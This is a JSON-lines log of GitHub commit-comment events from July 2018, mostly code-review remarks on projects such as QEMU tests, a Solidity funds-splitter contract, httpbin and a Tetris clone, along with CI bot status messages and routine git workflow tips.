{"id":"7917466298","type":"CommitCommentEvent","actor":{"login":"WUFANYONG"},"repo":{"name":"WUFANYONG/APPT"},"payload":{"comment":{"id":29592673,"position":1,"line":1,"path":"README.md","commit_id":"480d8e9b363a111b3dfb8f1c3978ae7f975819c4","created_at":"2018-07-04T09:55:38Z","updated_at":"2018-07-04T09:55:38Z","author_association":"OWNER","body":"标注APPT 程序"}},"created_at":"2018-07-04T09:55:38Z"}
{"id":"7917467061","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592675,"position":4,"line":768,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:55:47Z","updated_at":"2018-07-04T09:55:47Z","author_association":"NONE","body":"I think we should move all files to tests/libqos, rename MODULE_INIT_LIBQGRAPH to MODULE_INIT_LIBQOS, etc.\r\n\r\nThis would be a pain to do manually. Instead, try this experiment:\r\n\r\n* generate the diff with `git format-patch --stdout origin/master.. > libqgraph.patch`\r\n* make a backup of the diff :) do the changes with your editor directly on the diff\r\n* at each step, try reapplying the diff:\r\n\r\n    git checkout -b qgraph-review origin/master\r\n    git am libqgraph.patch\r\n\r\nIf it doesn't work, go back to the backup. If it works, push the branch to github, make a new backup (`cp libqgraph.patch libqgraph-works.patch`), and go on. It's sort of sorcery-level git, but I think you can manage it. ;)  After the first time, the temporary branch `qgraph-review` will have to be rewound, not created:\r\n\r\n    git checkout qgraph-review      # ensure you're on the right branch\r\n    git reset --hard origin/master"}},"created_at":"2018-07-04T09:55:47Z"}
{"id":"7917469326","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592684,"position":157,"line":157,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:56:15Z","updated_at":"2018-07-04T09:56:15Z","author_association":"NONE","body":":D"}},"created_at":"2018-07-04T09:56:15Z"}
{"id":"7917472315","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592690,"position":6,"line":6,"path":"tests/qgraph/test-qgraph.c","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:56:50Z","updated_at":"2018-07-04T09:56:50Z","author_association":"NONE","body":"For constant strings, either hard code it, or use #define (and lowercase->uppercase)."}},"created_at":"2018-07-04T09:56:50Z"}
{"id":"7917472990","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29592694,"position":null,"line":null,"path":null,"commit_id":"506855ceaba9998b58e453321226b4ae1320cd5d","created_at":"2018-07-04T09:56:57Z","updated_at":"2018-07-04T09:56:57Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-506855ceaba9998b58e453321226b4ae1320cd5d-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-04T09:56:57Z"}
{"id":"7917477407","type":"CommitCommentEvent","actor":{"login":"hathach"},"repo":{"name":"adafruit/circuitpython"},"payload":{"comment":{"id":29592704,"position":null,"line":null,"path":null,"commit_id":"7fff7f5e70c652ccffce2a598a4e3b7df92ad67b","created_at":"2018-07-04T09:57:48Z","updated_at":"2018-07-04T09:57:48Z","author_association":"MEMBER","body":"It will only show up msc, only read by now, added the write mode later. At least it runs, it may break other nrf52 board though, will clean it up & organize later. Only pca10056 got tested for now, and you need to use the v1.0  the pdk won't work since the pre-production silicion is full of usb hw bug. "}},"created_at":"2018-07-04T09:57:48Z"}
{"id":"7917480300","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592715,"position":1,"line":1,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:58:20Z","updated_at":"2018-07-04T09:58:20Z","author_association":"NONE","body":"Also, each new file needs a license header:\r\n\r\n/*\r\n * libqos driver framework\r\n *\r\n * Copyright (c) 2018 Emanuele Giuseppe Esposito <youraddresshere@gmail.com>\r\n *\r\n * This library is free software; you can redistribute it and/or\r\n * modify it under the terms of the GNU Lesser General Public\r\n * License version 2 as published by the Free Software Foundation.\r\n *\r\n * This library is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\r\n * Lesser General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU Lesser General Public\r\n * License along with this library; if not, see <http://www.gnu.org/licenses/>\r\n */"}},"created_at":"2018-07-04T09:58:20Z"}
{"id":"7917480337","type":"CommitCommentEvent","actor":{"login":"dl8bh"},"repo":{"name":"dovecot/core"},"payload":{"comment":{"id":29592716,"position":null,"line":null,"path":null,"commit_id":"4ff4bd024a9b6e7973b76b186ce085c2ca669d3e","created_at":"2018-07-04T09:58:20Z","updated_at":"2018-07-04T09:58:20Z","author_association":"NONE","body":"Just realized this myself minutes after posting this, but thanks for answering anyways :-)"}},"created_at":"2018-07-04T09:58:20Z"}
{"id":"7917480791","type":"CommitCommentEvent","actor":{"login":"jaffarChatApp"},"repo":{"name":"jaffarChatApp/jaffarChatApp"},"payload":{"comment":{"id":29592720,"position":null,"line":null,"path":null,"commit_id":"f109651cd6a35694e78f17387445b3582ef437a5","created_at":"2018-07-04T09:58:25Z","updated_at":"2018-07-04T09:58:25Z","author_association":"OWNER","body":"Revert changes for old without one signal"}},"created_at":"2018-07-04T09:58:25Z"}
{"id":"7917483087","type":"CommitCommentEvent","actor":{"login":"cmb69"},"repo":{"name":"Jan-E/v8js"},"payload":{"comment":{"id":29592723,"position":5,"line":214,"path":"v8js_v8object_class.cc","commit_id":"0a12ac19d8afa13a435d23be05fa15b2931be67d","created_at":"2018-07-04T09:58:51Z","updated_at":"2018-07-04T09:58:51Z","author_association":"NONE","body":"This declaration needs to be moved up for C89 compatibility, if that is desired, since C89 doesn't allow to mix declarations and statements."}},"created_at":"2018-07-04T09:58:51Z"}
{"id":"7917483475","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592725,"position":157,"line":157,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T09:58:56Z","updated_at":"2018-07-04T09:58:56Z","author_association":"OWNER","body":"whops\r\nsorry"}},"created_at":"2018-07-04T09:58:56Z"}
{"id":"7920392757","type":"CommitCommentEvent","actor":{"login":"danieldahan"},"repo":{"name":"CosmicMind/Material"},"payload":{"comment":{"id":29600321,"position":29,"line":420,"path":"Sources/iOS/TabsController.swift","commit_id":"a741f921c4275d6799f67b16e07546490cddc594","created_at":"2018-07-05T00:02:37Z","updated_at":"2018-07-05T00:02:37Z","author_association":"MEMBER","body":"Correct, is there a consideration I am not making?"}},"created_at":"2018-07-05T00:02:37Z"}
{"id":"7920393964","type":"CommitCommentEvent","actor":{"login":"drjecker"},"repo":{"name":"michaelsoriano/wp-vue-starter"},"payload":{"comment":{"id":29600326,"position":null,"line":null,"path":null,"commit_id":"ddc3c120b02d1343287aa2048b8f4cd54ff607b9","created_at":"2018-07-05T00:03:27Z","updated_at":"2018-07-05T00:03:27Z","author_association":"NONE","body":"Oops. Should read missing `/`"}},"created_at":"2018-07-05T00:03:27Z"}
{"id":"7920394044","type":"CommitCommentEvent","actor":{"login":"reubenayres"},"repo":{"name":"TetrisCrowley/Tetris-Cloneley"},"payload":{"comment":{"id":29600327,"position":28,"line":231,"path":"js/app.js","commit_id":"dd8dd2a0123d5f9962d902ee3d8e94bbe99648ec","created_at":"2018-07-05T00:03:30Z","updated_at":"2018-07-05T00:03:30Z","author_association":"NONE","body":"you don't need to pass in a parameter here"}},"created_at":"2018-07-05T00:03:30Z"}
{"id":"7920394464","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29600329,"position":12,"line":41,"path":"contracts/FundsSplitter.sol","commit_id":"a144452b26bfdf78ff7239c1d577076012e488cf","created_at":"2018-07-05T00:03:44Z","updated_at":"2018-07-05T00:03:44Z","author_association":"NONE","body":"The important thing is to recognize that a rounding error (truncation) will occur it's bad form to leave \"dust\" lying around without accounting for it. We'll make a better solution when we get into the stretch goals. This is fine for now. "}},"created_at":"2018-07-05T00:03:44Z"}
{"id":"7920394890","type":"CommitCommentEvent","actor":{"login":"reubenayres"},"repo":{"name":"TetrisCrowley/Tetris-Cloneley"},"payload":{"comment":{"id":29600331,"position":13,"line":80,"path":"js/app.js","commit_id":"dd8dd2a0123d5f9962d902ee3d8e94bbe99648ec","created_at":"2018-07-05T00:04:04Z","updated_at":"2018-07-05T00:04:04Z","author_association":"NONE","body":"why newShape?\r\nyou should just be updating this.shape to be the new array.\r\n"}},"created_at":"2018-07-05T00:04:04Z"}
{"id":"7920396000","type":"CommitCommentEvent","actor":{"login":"reubenayres"},"repo":{"name":"TetrisCrowley/Tetris-Cloneley"},"payload":{"comment":{"id":29600332,"position":5,"line":74,"path":"js/app.js","commit_id":"dd8dd2a0123d5f9962d902ee3d8e94bbe99648ec","created_at":"2018-07-05T00:04:40Z","updated_at":"2018-07-05T00:04:40Z","author_association":"NONE","body":"did you forget an ="}},"created_at":"2018-07-05T00:04:40Z"}
{"id":"7920397516","type":"CommitCommentEvent","actor":{"login":"Potatokev1n"},"repo":{"name":"Potatokev1n/pkevins-mini-mods"},"payload":{"comment":{"id":29600337,"position":null,"line":null,"path":null,"commit_id":"13e4e80fd9828289869fbe92ece07e9a39b132a7","created_at":"2018-07-05T00:05:45Z","updated_at":"2018-07-05T00:05:45Z","author_association":"OWNER","body":"makin mods real soon"}},"created_at":"2018-07-05T00:05:45Z"}
{"id":"7920397823","type":"CommitCommentEvent","actor":{"login":"s777610"},"repo":{"name":"s777610/price_alert_for_olinestore"},"payload":{"comment":{"id":29600339,"position":null,"line":null,"path":null,"commit_id":"5ac8a2d529d40338a4b4785cb299187f86e63a4e","created_at":"2018-07-05T00:06:00Z","updated_at":"2018-07-05T00:06:00Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-05T00:06:00Z"}
{"id":"7920397989","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29600340,"position":16,"line":45,"path":"contracts/FundsSplitter.sol","commit_id":"a144452b26bfdf78ff7239c1d577076012e488cf","created_at":"2018-07-05T00:06:08Z","updated_at":"2018-07-05T00:06:08Z","author_association":"NONE","body":"Here, you should not trust people to send their address or allow people to send funds to elsewhere. I don't think that's what you meant. You should use `msg.sender` to _know_ the address of the account that signed the transaction (and paid for gas) and sent the data. No need to ask who it is. I would also call it \"amount\" for clarity. \r\n\r\n```\r\nfunction withdrawFunds(uint amount) public returns(bool success) {\r\n ...\r\n```"}},"created_at":"2018-07-05T00:06:08Z"}
{"id":"7920398547","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29600342,"position":20,"line":49,"path":"contracts/FundsSplitter.sol","commit_id":"a144452b26bfdf78ff7239c1d577076012e488cf","created_at":"2018-07-05T00:06:31Z","updated_at":"2018-07-05T00:06:31Z","author_association":"NONE","body":"```\r\nif(msg.sender==bob) ...\r\n```\r\n"}},"created_at":"2018-07-05T00:06:31Z"}
{"id":"7920400450","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29600346,"position":11,"line":11,"path":"NET.S.2018.Lavrenov.03/Task5/IntegerActions.cs","commit_id":"15663e459262c433fc58e5d8f17bfcb6991c363f","created_at":"2018-07-05T00:07:53Z","updated_at":"2018-07-05T00:07:53Z","author_association":"OWNER","body":"исправил\r\n"}},"created_at":"2018-07-05T00:07:53Z"}
{"id":"7920401103","type":"CommitCommentEvent","actor":{"login":"reubenayres"},"repo":{"name":"TetrisCrowley/Tetris-Cloneley"},"payload":{"comment":{"id":29600348,"position":28,"line":231,"path":"js/app.js","commit_id":"dd8dd2a0123d5f9962d902ee3d8e94bbe99648ec","created_at":"2018-07-05T00:08:23Z","updated_at":"2018-07-05T00:08:23Z","author_association":"NONE","body":"also, pretty soon, you should have the current block be a property of the game object and not just a variable in the global scope\r\n"}},"created_at":"2018-07-05T00:08:23Z"}
{"id":"7920401227","type":"CommitCommentEvent","actor":{"login":"Elavrenov"},"repo":{"name":"Elavrenov/Training.-Summer-2018"},"payload":{"comment":{"id":29600349,"position":null,"line":null,"path":null,"commit_id":"15663e459262c433fc58e5d8f17bfcb6991c363f","created_at":"2018-07-05T00:08:28Z","updated_at":"2018-07-05T00:08:28Z","author_association":"OWNER","body":"Понял, принял, исправлю"}},"created_at":"2018-07-05T00:08:28Z"}
{"id":"7920401623","type":"CommitCommentEvent","actor":{"login":"taitetsu"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29600350,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-05T00:08:45Z","updated_at":"2018-07-05T00:08:45Z","author_association":"MEMBER","body":"@yuji ^^^"}},"created_at":"2018-07-05T00:08:45Z"}
{"id":"7920401708","type":"CommitCommentEvent","actor":{"login":"reubenayres"},"repo":{"name":"TetrisCrowley/Tetris-Cloneley"},"payload":{"comment":{"id":29600351,"position":28,"line":231,"path":"js/app.js","commit_id":"dd8dd2a0123d5f9962d902ee3d8e94bbe99648ec","created_at":"2018-07-05T00:08:49Z","updated_at":"2018-07-05T00:08:49Z","author_association":"NONE","body":"since your blocks will be being randomly generated at all \r\n"}},"created_at":"2018-07-05T00:08:49Z"}
{"id":"7920403664","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29600355,"position":null,"line":null,"path":null,"commit_id":"d0d97de97d94c94405168dcc2e220bcec844982d","created_at":"2018-07-05T00:10:14Z","updated_at":"2018-07-05T00:10:14Z","author_association":"CONTRIBUTOR","body":"I saw a larger bacteria hunting a smaller bacteria, and that was cool to watch so things are working okay for now."}},"created_at":"2018-07-05T00:10:14Z"}
{"id":"7920405061","type":"CommitCommentEvent","actor":{"login":"yuji"},"repo":{"name":"movabletype/movabletype"},"payload":{"comment":{"id":29600365,"position":8,"line":139,"path":"lib/MT/ArchiveType/ContentTypeAuthor.pm","commit_id":"e614c70df345bf8de809b3fe982fecdaae425484","created_at":"2018-07-05T00:11:12Z","updated_at":"2018-07-05T00:11:12Z","author_association":"MEMBER","body":"あーすまんです。すっかりそれ忘れてる。。。\r\n\r\nNo Limit で行けるのであれば limit の初期値はなし。対象が全件どん"}},"created_at":"2018-07-05T00:11:12Z"}
{"id":"7920408430","type":"CommitCommentEvent","actor":{"login":"malheiros7j"},"repo":{"name":"malheiros7j/TCC-Categoriza-o-ProjetosLei"},"payload":{"comment":{"id":29600371,"position":null,"line":null,"path":null,"commit_id":"3b5d974ecccfce2386ed282484a44a09ddb40ebf","created_at":"2018-07-05T00:13:41Z","updated_at":"2018-07-05T00:13:41Z","author_association":"OWNER","body":"Projetos de Lei retirados do site da câmara municipal de Campo Grande - MS\r\nURL: http://www.camara.ms.gov.br/projetos-de-lei\r\nLINK DIRETO: http://sgl4.net/cmcg-consulta/consulta-projetos-ementa.lbsp"}},"created_at":"2018-07-05T00:13:41Z"}
{"id":"7920408718","type":"CommitCommentEvent","actor":{"login":"eturk1"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29600372,"position":null,"line":null,"path":null,"commit_id":"660801081cc485754720a11cc83a03c4c1df10e0","created_at":"2018-07-05T00:13:55Z","updated_at":"2018-07-05T00:13:55Z","author_association":"NONE","body":"why would we want to use query parms (GET) as POST form data? \r\nseems like allowing that would just invite confusion"}},"created_at":"2018-07-05T00:13:55Z"}
{"id":"7920409113","type":"CommitCommentEvent","actor":{"login":"afgane"},"repo":{"name":"CloudVE/cloudbridge"},"payload":{"comment":{"id":29600373,"position":null,"line":null,"path":null,"commit_id":"258303ab551967f237a160526ccd8f2c8e2daaf4","created_at":"2018-07-05T00:14:13Z","updated_at":"2018-07-05T00:14:13Z","author_association":"CONTRIBUTOR","body":"xref https://github.com/CloudVE/cloudbridge/issues/126"}},"created_at":"2018-07-05T00:14:13Z"}
{"id":"7920412849","type":"CommitCommentEvent","actor":{"login":"Gregory-Meyer"},"repo":{"name":"Gregory-Meyer/update-alternatives"},"payload":{"comment":{"id":29600383,"position":null,"line":null,"path":null,"commit_id":"fd16625a62830c372f7ea242e68e9d1a8a561127","created_at":"2018-07-05T00:17:02Z","updated_at":"2018-07-05T00:17:02Z","author_association":"OWNER","body":"actually bumped to 0.4.1"}},"created_at":"2018-07-05T00:17:02Z"}
{"id":"7920413920","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29600388,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-05T00:17:46Z","updated_at":"2018-07-05T00:17:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T00:17:46Z"}
{"id":"7920413935","type":"CommitCommentEvent","actor":{"login":"eturk1"},"repo":{"name":"requests/httpbin"},"payload":{"comment":{"id":29600389,"position":567,"line":630,"path":"httpbin/core.py","commit_id":"660801081cc485754720a11cc83a03c4c1df10e0","created_at":"2018-07-05T00:17:46Z","updated_at":"2018-07-05T00:17:46Z","author_association":"NONE","body":"Why would we want to allow query parms (GET) to feed a POST?\r\nSeems like it would invite/allow mixing the two, which should fail, right?\r\n(i.e. code uses a POST but mistakenly passes via URL. That should fail.)\r\n\r\n(Couldn’t find this comment on github so posted with email reply)\r\n\r\nFrom: Brett Randall <notifications@github.com>\r\nSent: Wednesday, July 4, 2018 4:17 PM\r\nTo: requests/httpbin <httpbin@noreply.github.com>\r\nCc: eturk <erolfox@live.com>; Mention <mention@noreply.github.com>\r\nSubject: Re: [requests/httpbin] fix broken things (6608010)\r\n\r\n\r\nWith reference to question by @eturk1<https://github.com/eturk1> in #480<https://github.com/requests/httpbin/pull/480> re #476<https://github.com/requests/httpbin/issues/476> - my change on the left here is an attempt to allow POST, PATCH and PUT to pass both url (required) and status_code (optional, default 302) as formData, as you might expect with these methods. It supported only x-www-form-encoded bodies (no JSON payloads).\r\n\r\nHowever it did break [this test]https://github.com/requests/httpbin/blob/master/test_httpbin.py#L588) which presumes that you can also pass these parameters for POST in the query-string, which is why @kennethreitz<https://github.com/kennethreitz> has reverted it. So POST would not work again now.\r\n\r\n@kennethreitz<https://github.com/kennethreitz> assuming the test remains valid and you should be able to continue to pass these parameters for POST and the other methods (I can't see why not), shall we just change this to have any form-data override any query-string params (for these methods only), so allowing both? Or is there a reason we would want to for forbid the form-data versions?\r\n\r\n... I'll write a test too!\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/requests/httpbin/commit/660801081cc485754720a11cc83a03c4c1df10e0#commitcomment-29600187>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAgD4N6rIA5nYHdxGRs1_QyTALouamcaks5uDUzQgaJpZM4VDFLg>.\r\n"}},"created_at":"2018-07-05T00:17:46Z"}
{"id":"7920414166","type":"CommitCommentEvent","actor":{"login":"norraxx"},"repo":{"name":"FAForever/faf-java-api"},"payload":{"comment":{"id":29600392,"position":63,"line":155,"path":"src/main/java/com/faforever/api/data/domain/Achievement.java","commit_id":"9d624ed6fd39705497411f69f42e63f1674162cd","created_at":"2018-07-05T00:17:56Z","updated_at":"2018-07-05T00:17:56Z","author_association":"NONE","body":"*paranoic*\r\nIf that view will return null value rows, server will return errors.\r\n```\r\n\"InternalServerErrorException: org.hibernate.PropertyAccessException: Null value was assigned to a property of primitive type setter of com.faforever.api.data.domain.Achievement.unlockersCount\"\r\n```\r\n*/paranoic*"}},"created_at":"2018-07-05T00:17:56Z"}
{"id":"7920414171","type":"CommitCommentEvent","actor":{"login":"HighwaymanDismas"},"repo":{"name":"HighwaymanDismas/SpaceShooter3000"},"payload":{"comment":{"id":29600393,"position":null,"line":null,"path":null,"commit_id":"5e26694d4cd9629022d13e60e6b32b22d87a56ec","created_at":"2018-07-05T00:17:56Z","updated_at":"2018-07-05T00:17:56Z","author_association":"OWNER","body":"xd"}},"created_at":"2018-07-05T00:17:56Z"}
{"id":"7920420605","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29600405,"position":null,"line":null,"path":null,"commit_id":"2c49bdac534b31e6712642009b9ba0990a937531","created_at":"2018-07-05T00:22:40Z","updated_at":"2018-07-05T00:22:40Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/65/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/65//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2c49bdac534b31e6712642009b9ba0990a937531/65/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2c49bdac534b31e6712642009b9ba0990a937531/65/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2c49bdac534b31e6712642009b9ba0990a937531/65/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/2c49bdac534b31e6712642009b9ba0990a937531/65/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T00:22:40Z"}
{"id":"7920429079","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29600436,"position":null,"line":null,"path":null,"commit_id":"63d9263c33d13e603924ee2298af8d63a3f92299","created_at":"2018-07-05T00:28:38Z","updated_at":"2018-07-05T00:28:38Z","author_association":"CONTRIBUTOR","body":"I would have removed the bullets with all these emoji assaults on precinct 69"}},"created_at":"2018-07-05T00:28:38Z"}
{"id":"7920431468","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29600448,"position":null,"line":null,"path":null,"commit_id":"a20dca9f23c8833bbdc9c8780a764b6c266376d5","created_at":"2018-07-05T00:30:17Z","updated_at":"2018-07-05T00:30:17Z","author_association":"CONTRIBUTOR","body":"I had half a mind of doing just that on the contributing portion :) :+1: "}},"created_at":"2018-07-05T00:30:17Z"}
{"id":"7920437956","type":"CommitCommentEvent","actor":{"login":"p1gd0g"},"repo":{"name":"mchwalisz/mendeleydesktop_aur"},"payload":{"comment":{"id":29600463,"position":null,"line":null,"path":null,"commit_id":"53f6d475313da04ac3b7e7a281fbf62e0e6e0406","created_at":"2018-07-05T00:34:40Z","updated_at":"2018-07-05T00:34:40Z","author_association":"NONE","body":"Anyway, this works for me. Thanks."}},"created_at":"2018-07-05T00:34:40Z"}
{"id":"7920438047","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600464,"position":33,"line":33,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T00:34:43Z","updated_at":"2018-07-05T00:34:43Z","author_association":"NONE","body":"does this need:\r\n\r\n  \"db_sync_cmd\" => \"ec2-api-manage --config-dir /etc/ec2api/ec2api.conf.d/ --config-dir %{db_override_conf} db_sync\",\r\n\r\nIe the \"db_sync_cmd\" at the start?"}},"created_at":"2018-07-05T00:34:43Z"}
{"id":"7920439851","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600466,"position":41,"line":41,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T00:35:57Z","updated_at":"2018-07-05T00:35:57Z","author_association":"NONE","body":"\"ceilometer-dbsync --config-file %{db_override_conf}\""}},"created_at":"2018-07-05T00:35:57Z"}
{"id":"7920440621","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600467,"position":45,"line":45,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T00:36:28Z","updated_at":"2018-07-05T00:36:28Z","author_association":"NONE","body":"heat-manage --config-file %{db_override_conf} db_sync"}},"created_at":"2018-07-05T00:36:28Z"}
{"id":"7920441291","type":"CommitCommentEvent","actor":{"login":"matthewoliver"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29600468,"position":49,"line":49,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-05T00:36:52Z","updated_at":"2018-07-05T00:36:52Z","author_association":"NONE","body":"aodh-dbsync --config-file %{db_override_conf}"}},"created_at":"2018-07-05T00:36:52Z"}
{"id":"7920441852","type":"CommitCommentEvent","actor":{"login":"dezhaddock"},"repo":{"name":"dezhaddock/ToDoList"},"payload":{"comment":{"id":29600470,"position":null,"line":null,"path":null,"commit_id":"0f530fece91c9093dce63b30c6615ef86ce91eb4","created_at":"2018-07-05T00:37:14Z","updated_at":"2018-07-05T00:37:14Z","author_association":"OWNER","body":"### Dez's Todo List\r\n\r\n- [ ] Hot Tub Chemicals\r\n- [ ] Awning Permit\r\n- [ ] Documents FedEx\r\n- [ ] Electrical Work\r\n- [ ] Hypno Therapy Training\r\n- [ ] Ikea Desks for Binstien\r\n- [ ] Arrange with Abrahim to move stuff from Wall Center to Beinstein Basement\r\n- [ ] Need 4 Ikea Desks in Beinstein Basement\r\n- [x] ~~Get Engineering fix toilet in FS Chain is broken~~\r\n- [ ] Get Engineering fix phone - keeps ringing to my bedroom washroom :phone:\r\n- [x] ~~Book Car wash for Maybach~~ :car:\r\n- [ ] Grid lighting payment - forwarded to HY\r\n"}},"created_at":"2018-07-05T00:37:14Z"}
{"id":"7920443060","type":"CommitCommentEvent","actor":{"login":"dezhaddock"},"repo":{"name":"dezhaddock/ToDoList"},"payload":{"comment":{"id":29600471,"position":null,"line":null,"path":null,"commit_id":"0f530fece91c9093dce63b30c6615ef86ce91eb4","created_at":"2018-07-05T00:38:08Z","updated_at":"2018-07-05T00:38:08Z","author_association":"OWNER","body":"### Dez's Todo List\r\n\r\n- [ ] Hot Tub Chemicals\r\n- [ ] Awning Permit\r\n- [ ] Documents FedEx\r\n- [ ] Electrical Work\r\n- [ ] Hypno Therapy Training\r\n- [ ] Ikea Desks for Binstien\r\n- [ ] Arrange with Abrahim to move stuff from Wall Center to Beinstein Basement\r\n- [ ] Need 4 Ikea Desks in Beinstein Basement\r\n- [x] ~~Get Engineering fix toilet in FS Chain is broken~~\r\n- [ ] Get Engineering fix phone - keeps ringing to my bedroom washroom\r\n- [x] Book Car wash for Maybach:\r\n- [ ] Grid lighting payment - forwarded to HY\r\n"}},"created_at":"2018-07-05T00:38:08Z"}
{"id":"7920444032","type":"CommitCommentEvent","actor":{"login":"jcayzac"},"repo":{"name":"NemoOudeis/android-buildconfig"},"payload":{"comment":{"id":29600476,"position":null,"line":null,"path":null,"commit_id":"fad0c82de4acf65e849188e43b63eec30fff18f1","created_at":"2018-07-05T00:38:49Z","updated_at":"2018-07-05T00:38:49Z","author_association":"NONE","body":"https://docs.gradle.org/current/userguide/java_library_plugin.html#sec:java_library_separation\r\n\r\n>  The `api` configuration should be used to declare dependencies which are exported by the library API, whereas the `implementation` configuration should be used to declare dependencies which are internal to the component.\r\n\r\nWe want to _export_ the findbugs suppressions to client projects, so I disagree with using `implementation` here. The annotations should be `api`, and maybe mandate a `-dontnote` line in the consumer proguard files."}},"created_at":"2018-07-05T00:38:49Z"}
